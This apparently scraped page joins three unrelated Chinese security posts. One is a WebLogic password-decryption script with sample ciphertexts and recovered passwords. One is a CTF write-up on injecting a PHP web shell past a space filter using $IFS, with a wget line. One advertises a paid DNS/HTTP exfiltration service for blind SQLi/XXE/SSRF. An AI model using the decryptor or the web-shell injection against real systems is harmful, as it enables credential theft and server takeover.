WebLogic 密码恢复

Title : How to recover the Password in WebLogic Server

The below steps need to follow to cover the password in weblogic server.

Step 1:

Run setWlstEnv.sh for setting up the environment variables.

Ex:-

. /u01/Middleware/oracle_common/common/bin/setWlstEnv.sh

Step 2:

weblogic password recover command –

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:p0o9i8u7
========================================

Step 3:

weblogic user recovery command –

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}WsnwdqROocsh6D1YOclnc1ySRyzheBNtZD2AGLnjIFM\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:weblogic
========================================

 

 

decryptpassword.py:

import os
import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService
 
def decryptString(domainPath, encryptedString):
    es = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domainPath)
    ces = weblogic.security.internal.encryption.ClearOrEncryptedService(es)
    decryptedString = ces.decrypt(encryptedString)
    print "=" * 70
    print " " * 10 +"Decrypted Password:" + decryptedString
    print "=" * 70
 
try:
    #os.system('clear')
    if len(sys.argv) == 3:
        decryptString(sys.argv[1], sys.argv[2])
    else:
        print "=" * 70
        print "INVALID ARGUMENTS"
        print "Usage: java weblogic.WLST %s " %sys.argv[0]
        print "example.:"
        print "    java weblogic.WLST %s /oracle/fmwhome/user_projects/domains/NT/ {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=" %sys.argv[0]
        print "=" * 70
except:
    print "Unexpected error: ", sys.exc_info()[0]
    dumpStack()
    raise

不使用空格执行Bash命令(绕过空格检测执行Bash命令)

原文链接: http://0xa.li/executing-bash-commands-without-space/
大家好,我在一次CTF比赛中和我的队友@aboul3la发现一种在Web应用挑战中进行命令注入的方法.
如果你输入`>file.txt`服务器就会创建一个file.txt的文件
我们想要写入一个PHP的shell,像这样:
echo "<?PHP CODE>" > file.php
但是问题是,这个比赛的题目过滤空格,不让输入空格(Error: Not valid URL)
所以我们尝试很多种办法绕过,一开始的思路是使用解码的方式来获得一个space(空格),比如从hex或者其他的什么解码成一个空格,但是这种方法在echo后面都不凑效

然后我就进行了搜索,看Linux是否自己已经对空格进行了定义.
最后我发现了,确实是$IFS

解决方法是:
echo\$IFS"<?=system(\$_GET[x]);?>">shell.php
如果你要下载东西,那么wget$IFShttps://google.com/robots.txt

14467750403809

英文原文:
Hello, world.

So I was in this CTF competition and my teammate (@aboul3la) found a command injection vulnerability in one of web application challenges.

If you input >file.txt the server creates a file called file.txt.

We wanted to write a PHP shell to the server (echo “<?PHP CODE>” > file.php)
But the thing is, the challenge had a filter that won’t allow you to have a space in the input (Error: Not valid URL)

So we tried around and my first thought was to use some decoding mechanism to decrypt “space” from it’s hex equivalent or something, but we couldn’t do it without a space after the “echo”
Then i thought i should search and see if the space (or tab) is defined in Linux itself.
And i found it: $IFS.

The solution was:
echo$IFS”<?=system($_GET[x]);?>”>shell.php

If you wanted to wget something: wget$IFS”https://google.com/robots.txt”

HawkEye鹰眼系统发布(SQLi/XXE/SSRF神器)

HawkEye DNs

HawkEye鹰眼系统发布,这个系统可以用在内网服务器映射到公网而且内网服务器没有访问公网建立TCP请求的权限,而且没办法直接获取数据的情况,因此可以使用一般不会被封堵的DNS隧道来向外发送数据.

HawkEye Log

还有一种情况,在发现类似于XXE这种漏洞,能够访问外网,但是没办法直接回显数据的情况,可以通过URL拼接的方式获取数据(Oracle数据库也可以发起http请求,看具体场景)
还有一些其他的高级渗透情况…….希望大家一起来补充.

费用

平台采用付费方式运行,因为后端要跑一台VPS,还要域名续费,还要SAE平台的Web流量和Mysql查询次数都需要费用,当然这都是在不计开发成本和人力成本的情况下的.所以平台不希望以一种完全免费的方式运行,而采取更能够鼓励我们开发团队进步的收费方式进行.但是费用不会太高,初步定价是10RMB使用3个月,因此一个月才3元多一点,相当于来电显示费用,可是来电显示却远远不能提供给我们这样的服务…..

访问地址

平台URL: http://hawkeye.hackinglab.cn/Index/Charge.php

平台特性

平台采用HackingLab统一的SSO方式进行登录,因此你需要在Hackinglab.cn登录你的账号.
不过请放心,Hackinglab.cn采用的是Oauth方式进行登录(支持微博和QQ),因此您完全不必要担心Hackinglab被入侵的最坏情况而导致您的账号被窃取的问题.大家都知道,没有一个系统是安全的…..但是我们也会尽最大努力确保平台的安全运行.
HackingLab.cn使用微博和QQ登录均会自动创建账号.
创建账号后,点击左边的功能区,HawkEye鹰眼来进入我们的HawkEye鹰眼系统.

进入后,您需要联系客服@喵喵_哒付费,付费可通过微信面对面付款,也可以直接给我转wb,告诉我你的用户名和第一次登录的大致时间,我们客服将会给您开通相应的使用权限.

么么哒

我们支持大家发现平台的漏洞,但不希望对平台造成破坏,并恳请各位大哥大姐,不要DDOS咱们的服务器,希望这样一个平台能够给大家一个轻松便捷的方式来进行高级一点的渗透测试,节省您的宝贵时间.

同时,欢迎童鞋们进行打赏!! 据说您的打赏将直接决定我们的客服妹纸下个月做头发的次数……._^

最后,恳请各大黑阔不要攻击我们的平台,真心的….感谢!

平台截图